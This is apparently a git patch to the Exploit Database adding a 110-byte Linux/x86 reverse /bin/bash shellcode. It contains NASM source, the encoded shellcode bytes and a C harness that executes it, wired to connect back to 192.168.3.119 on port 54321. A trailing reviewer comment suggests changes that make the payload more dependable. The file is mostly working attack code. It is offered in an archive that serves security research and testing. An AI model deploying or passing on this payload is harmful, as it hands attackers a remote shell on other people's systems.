From d2c8c83204a670ccd96342b00a9c7146d0782c58 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 27 Mar 2017 05:01:17 +0000
Subject: [PATCH] DB: 2017-03-27

1 new exploits

Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)

---
 files.csv | 1 +
 platforms/lin_x86/shellcode/41723.c | 99 +++++++++++++++++++++++++++++
 2 files changed, 100 insertions(+)
 create mode 100755 platforms/lin_x86/shellcode/41723.c
diff --git a/files.csv b/files.csv
index 6c158a8fb..85b240f5b 100644
--- a/files.csv
+++ b/files.csv
@@ -16019,6 +16019,7 @@ id,file,description,date,author,platform,type,port
 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
+41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
diff --git a/platforms/lin_x86/shellcode/41723.c b/platforms/lin_x86/shellcode/41723.c
new file mode 100755
index 000000000..e04a4a220
--- /dev/null
+++ b/platforms/lin_x86/shellcode/41723.c
@@ -0,0 +1,99 @@
+/*
+; File name: reversebash.nasm
+; Author: Jasmin Landry (@JR0ch17)
+; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
+; To change
+; Shellcode length: 110 bytes
+; Tested on Ubuntu 12.04.5 32-bit (x86)
+; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
+; Link: ld -z execstack -o reversebash reversebash.o
+; Use objdump to find shellcode and copy it over to the code section of the .c file
+; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2
+
+global _start
+
+section .text
+_start:
+ jmp short call_shellcode
+
+shellcode:
+ xor eax, eax
+ xor ebx, ebx
+ xor ecx, ecx
+
+ pop edx
+
+ push 0x6
+ push 0x1
+ push 0x2
+
+ mov al, 0x66
+ mov bl, 0x1
+ mov ecx, esp
+ int 0x80
+
+ mov esi, eax
+
+ xor eax, eax
+ push eax
+ push dword [edx+2]
+ push word [edx]
+ push word 0x2
+ mov ecx, esp
+ push 0x10
+ push ecx
+ push esi
+ mov al, 0x66
+ mov bl, 0x3
+ mov ecx, esp
+ int 0x80
+
+ xor ecx, ecx
+ mov cl, 0x3
+
+loop:
+ dec cl
+ mov al, 0x3f
+ mov ebx, esi
+ int 0x80
+
+ mov esi, eax
+ jnz loop
+
+ xor eax, eax
+ xor ecx, ecx
+ push ecx
+ push 0x68736162
+ push 0x2f6e6962
+ push 0x2f2f2f2f
+ mov ebx, esp
+ push ecx
+ push ebx
+ mov al, 0xb
+ mov ecx, esp
+ xor edx, edx
+ int 0x80
+
+call_shellcode:
+ call shellcode
+ port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.
+
+*/
+
+
+#include
+#include
+
+unsigned char code[] = \
+"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
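Review bot: The two port bytes and four IP bytes after `call shellcode` are exactly the bytes the `port:` comment tells users to edit, yet nothing warns that a zero byte there (port 256 is 0x01 0x00; any address with a 0 octet such as 10.0.0.1) NUL-truncates the payload in any strcpy-style delivery and makes the harness's `strlen(code)` under-report the length; the comment should read `;First 2 bytes are port (network byte order), last 4 are IP; neither may contain 0x00 or the shellcode is NUL-truncated.` The `jnz loop` in the dup2 loop depends on ZF from `dec cl` surviving both `int 0x80` and `mov esi, eax`, which holds on Linux because the saved EFLAGS is restored on syscall return and `mov` leaves flags alone, but that is subtle enough to deserve a note like `; ZF from dec cl survives int 0x80 (EFLAGS restored) and mov`. In the C harness, `main()` relies on implicit int, which C99 removed and recent GCC/Clang reject by default, and `%d` is the wrong conversion for the `size_t` that `strlen` returns; `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(code));` fix both. The two bare `#include` lines look like their `<stdio.h>`/`<string.h>` names were lost in this rendering rather than in the commit, and the header line `; To change` is an unfinished fragment that should be completed or dropped.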